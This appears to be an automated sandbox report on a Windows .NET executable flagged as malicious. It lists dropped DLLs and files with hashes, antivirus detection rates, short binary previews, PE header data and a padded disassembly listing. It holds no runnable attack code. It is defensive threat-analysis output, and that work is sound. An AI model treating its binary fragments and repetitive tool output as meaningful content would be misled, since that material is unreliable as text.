                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (896), with no line terminators
                                              Category:dropped
                                              Size (bytes):896
                                              Entropy (8bit):5.899511606503722
                                              Encrypted:false
                                              SSDEEP:24:YGGBH48/uxg3Xb2AAvu6JUQtyJ5wVclMhSeHB34IN2x:YzTGxg3XiAApA3wV7hZRNW
                                              MD5:B6426F20616AAB83B4DB8E750876EC80
                                              SHA1:D016AABCB2E0D319DCCED2ACA38FF52E565BDA75
                                              SHA-256:86029761064CC39B8A3437D908BF8ECA61153D0837246035342A582B95CDA774
                                              SHA-512:B6B89C82D7CE3B965731406E897CB9D3573759A7E9E58F9F37E97AAB317E90B49240F0F30435CCB646260050395A66EA7F8844E44939DFB917E17EE5E0998D0A
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):85504
                                              Entropy (8bit):5.8769270258874755
                                              Encrypted:false
                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 71%
                                              Joe Sandbox View:
                                              • Filename: eRZQCpMb4y.exe, Detection: malicious, Browse
                                              • Filename: 4BJoBHQ6T3.exe, Detection: malicious, Browse
                                              • Filename: oG6R4bo1Rd.exe, Detection: malicious, Browse
                                              • Filename: PCCooker2.0_x64.exe, Detection: malicious, Browse
                                              • Filename: kQ6mFXrgYq.exe, Detection: malicious, Browse
                                              • Filename: kIdT4m0aa4.exe, Detection: malicious, Browse
                                              • Filename: 7buiOqC9uM.exe, Detection: malicious, Browse
                                              • Filename: PQmAnagsLM.exe, Detection: malicious, Browse
                                              • Filename: BN57miasVe.exe, Detection: malicious, Browse
                                              • Filename: 5R28W1PAnS.exe, Detection: malicious, Browse
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):23552
                                              Entropy (8bit):5.519109060441589
                                              Encrypted:false
                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):9728
                                              Entropy (8bit):5.0168086460579095
                                              Encrypted:false
                                              SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                              MD5:69546E20149FE5633BCBA413DC3DC964
                                              SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                              SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                              SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 4%
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):23552
                                              Entropy (8bit):5.529329139831718
                                              Encrypted:false
                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 3%
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):5.645950918301459
                                              Encrypted:false
                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 17%
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):69632
                                              Entropy (8bit):5.932541123129161
                                              Encrypted:false
                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 17%
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):32256
                                              Entropy (8bit):5.631194486392901
                                              Encrypted:false
                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 29%
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):1224
                                              Entropy (8bit):4.435108676655666
                                              Encrypted:false
                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                              Malicious:false
                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4608
                                              Entropy (8bit):3.988710960625709
                                              Encrypted:false
                                              SSDEEP:48:66pDPtKM7Jt8Bs3FJsdcV4MKe27ndCvqBHmOulajfqXSfbNtm:9PZPc+Vx9MAvkAcjRzNt
                                              MD5:1ED1BB9B127716409543B8BD3DD09D00
                                              SHA1:5078C71DCB0EAA7B45EEF070A3D55A3CD28EC529
                                              SHA-256:5F6842C05B64391B27128221991052742E041AF921DB784770058B9BBD1A882A
                                              SHA-512:3EDB9E399DE5F7B6754CA09D89A56DA4130196294B976657C06B06FFE774A828372CB0163CC73126594CCD9E5AADE2D240F27C2A68B98AEDA043FC724901DFB4
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../C.f.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):86
                                              Entropy (8bit):5.3880762370841415
                                              Encrypted:false
                                              SSDEEP:3:MVZEAM2Be6VoRt9z7E/ZKQRkH1IKHAH:MDM2BLG9XE/0EkH1pAH
                                              MD5:F19FA2180CBC4CD3E2E9DDA912CE40D3
                                              SHA1:8AFA5578136E050A437FCA8CF13EF37DA0832ABC
                                              SHA-256:36F4A6C2EA134313580547CC0BC5ACBA1A206505E4221A32B5028D9CAA387F3C
                                              SHA-512:F3BC3CEDA9E7065ABE12324E504EB26CFA733631455B51B2DE5B5A57C2869A8FCB3AE5B362C23B3BE982078DDB017E13B3EFE2BE5DE81268FC0348E0EEED15C5
                                              Malicious:false
                                              Preview:100qeDBLyhwtiRncGUN0K43WWRrWgfBMtHXnDXFkjBNcasAiTmAk1a476dTMWooTgj9a4AYsPmQJqb6nQJD4eb
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Windows\System32\w32tm.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):151
                                              Entropy (8bit):4.889773485226114
                                              Encrypted:false
                                              SSDEEP:3:VLV993J+miJWEoJ8FXVZz4LvUVJFRrMQi0GKrv:Vx993DEU2N4sGQM8
                                              MD5:D1F35D716AD79B2ABD05E0F93405D0B1
                                              SHA1:92366ACCE8AD3751A177147D64CA4D3722D3E89D
                                              SHA-256:77ACB50E8CE2239C7A58E3E0B9ABAF2A6E254F641F5E3A28249D9B678B97E7A0
                                              SHA-512:31E3CD7F901DC11A995EA36CDD687F1A54230813354D59487F11DB3DC4814968211D096097B9AF312CC0EB36853ED10E68FD5A6A05C70877D2E1A18A5FC22F28
                                              Malicious:false
                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 12/09/2024 15:38:37..15:38:37, error: 0x800705B4.15:38:43, error: 0x800705B4.
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.569188314300448
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File size:2'011'136 bytes
                                              MD5:b8aa70ed9243f5aa9c8dd45e8b6c01e7
                                              SHA1:8d871a1d93cc069413563d42dad3f098f4ac5e5d
                                              SHA256:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6cae0a25d742b650c62351
                                              SHA512:d2db111500ba7bc55f0913f888a38ba7b3986c2439fc0abd0ccd7feb4d4ac0d7863edb28c903ccb78c1f59e8eb29cbc4132ab2977560c2a5c21f089bb5ca72a7
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              TLSH:B695BF1775928E32C3605B358173463EA394EB753652EB0B361F14D3A80BBF58A722B7
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x5ec69e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66D3A930 [Sat Aug 31 23:37:20 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1ec650 | 0x4b | .text
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ee000 | 0x320 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1f0000 | 0xc | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
